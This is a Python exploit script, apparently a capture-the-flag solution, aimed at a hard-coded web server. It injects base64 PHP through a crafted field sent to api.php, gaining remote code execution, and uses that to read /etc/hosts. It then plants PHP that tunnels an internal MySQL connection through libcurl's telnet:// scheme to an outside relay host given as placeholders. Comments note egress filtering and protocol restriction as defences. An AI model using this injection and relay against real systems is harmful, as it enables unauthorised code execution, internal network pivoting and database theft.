import requests
import json
import base64
# Target web application: hard-coded address and port of the instance under test.
host: str = "47.89.249.223"
port: int = 49275
# Out-of-band endpoint the PHP template relays traffic to; both values are
# left as unfilled placeholders in this file.
remote_protocol_handler: str = "[remote_ip]"
remote_protocol_handler_port: str = "[remote_port]"
# PHP source that is later submitted through eval() below. It uses libcurl's
# telnet:// scheme to open a connection to {db_server}:3306; write_cb forwards
# each chunk the DB server sends as an application/octet-stream POST to
# http://{remote_server}:{remote_port}/ and queues the base64-decoded reply,
# which read_cb then hands back to the DB connection. From a defender's view
# the observable artefacts are web-tier egress to port 3306 over telnet:// and
# octet-stream POSTs to an external host; restricting the schemes curl may use
# (CURLOPT_PROTOCOLS) and outbound egress filtering both break this relay.
php_tmpl: str = """
$message_to_be_sent = ""; // make sure message_to_be_sent do not contain single \\xff
function write_cb($ch,$server_message) {
// receive server response
echo "Received Server Message: ".$server_message."\\n";
global $message_to_be_sent;
$newch = curl_init();
curl_setopt($newch, CURLOPT_URL, "http://{remote_server}:{remote_port}/");
curl_setopt($newch, CURLOPT_POST, true);
curl_setopt($newch, CURLOPT_HTTPHEADER, ["Content-Type: application/octet-stream"]);
curl_setopt($newch, CURLOPT_POSTFIELDS, $server_message);
curl_setopt($newch, CURLOPT_RETURNTRANSFER, true);
$resp = curl_exec($newch);
$message_to_be_sent = base64_decode($resp);
curl_close($newch);
return strlen($server_message);
}
function read_cb($ch, $fd, $length)
{
global $message_to_be_sent;
if($message_to_be_sent != ""){
echo "Sending Client Message: ". $message_to_be_sent."\\n";
$ret = $message_to_be_sent;
$message_to_be_sent = "";
return $ret;
} else {
return NULL;
}
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "telnet://{db_server}:3306/");
curl_setopt($ch, CURLOPT_WRITEFUNCTION, "write_cb");
curl_setopt($ch, CURLOPT_READFUNCTION, "read_cb" );
curl_setopt($ch, CURLOPT_TELNETOPTIONS, []);
$mh = curl_multi_init();
curl_multi_add_handle($mh,$ch);
$status = curl_multi_exec($mh, $active);
"""
# One shared session so any cookies set by login.php carry over to later requests.
s = requests.Session()
# Base URL of the target; the individual endpoints ("<name>.php") are appended to it.
target: str = "http://%s:%d/" % (host, port)
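def register() -> None:
    """Create the fixed test account on the target via register.php.

    Posts a constant username/password pair to ``target + "register.php"``
    using the module-level session ``s``. The HTTP response is not inspected,
    so a failed registration is not reported by this function.
    """
    credentials = {
        "username": "test123456",
        "password": "test123456",
    }
    # ``global s`` is unnecessary (``s`` is only read, never rebound) and the
    # response was previously bound to an unused local; the call's result is
    # deliberately discarded, matching the original behaviour.
    s.post(target + "register.php", data=credentials)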
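def login() -> None:
    """Authenticate as the fixed test account via login.php.

    Posts the same constant username/password pair that ``register`` uses to
    ``target + "login.php"`` through the module-level session ``s``, so any
    cookies the server sets persist for subsequent requests. The response is
    not inspected; a failed login is not detected here.
    """
    credentials = {
        "username": "test123456",
        "password": "test123456",
    }
    # No ``global s`` needed (read-only use) and no unused response local;
    # the result is intentionally discarded as in the original.
    s.post(target + "login.php", data=credentials)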
def eval(code: str) -> bytes | None:
    """Submit ``code`` to the target's api.php and return the decoded reply.

    NOTE: this function shadows the builtin ``eval``. ``getdbhost`` and the
    script tail call it by this name, so renaming it would require updating
    those callers as well.

    Args:
        code: Text that is wrapped with a ``"***/"`` prefix and ``"//"``
            suffix, UTF-8 encoded and base64-encoded before being embedded in
            the request.

    Returns:
        The base64-decoded ``message`` field of the JSON response when its
        ``status`` is ``"success"``, otherwise ``None``.

    Raises:
        json.JSONDecodeError: if the response body is not JSON.
        KeyError: if the JSON lacks ``status`` or ``message``.
        Neither case is handled here.
    """
    global s
    code = "***/" + code + "//"
    code = base64.b64encode(code.encode())
    # Request body handed to api.php; how the server interprets the "URL"
    # field is not visible in this file.
    data = {
        "URL": 'http;Lyo;$bd = base64_decode($this->getURL()); $bd = $bd[5].$bd[6].$bd[7].$bd; eval(base64_decode($bd));//\\");} public function test123456(){ eval(base64_decode(this->getURL())); var ch = curl_init();//%s' % code.decode()
    }
    r = s.post(target + "api.php", data=data)
    rj = json.loads(r.text)
    if rj["status"] == "success":
        mess = base64.b64decode(rj["message"])
        return mess
    else:
        return None
def getdbhost() -> None:
    """Print whatever the target returns for including /etc/hosts.

    Calls the module-level ``eval`` helper with a PHP ``include`` of
    ``/etc/hosts`` and prints the result (``bytes`` on success, ``None``
    otherwise). The local is named ``hosts_output`` rather than ``host`` so
    it does not shadow the module-level ``host`` constant.
    """
    hosts_output = eval("include '/etc/hosts';")
    print(hosts_output)
# Script entry sequence: create the account, log in, dump the hosts file.
register()
login()
getdbhost()
#host: 170.20.0.3, db: 172.20.0.2
# Fill the template's placeholders in the same order as the original chained
# str.replace() calls, then submit the resulting PHP through eval().
php_code = php_tmpl
for placeholder, value in (
    ("{db_server}", "172.20.0.2"),
    ("{remote_server}", remote_protocol_handler),
    ("{remote_port}", remote_protocol_handler_port),
):
    php_code = php_code.replace(placeholder, value)
print(eval(php_code))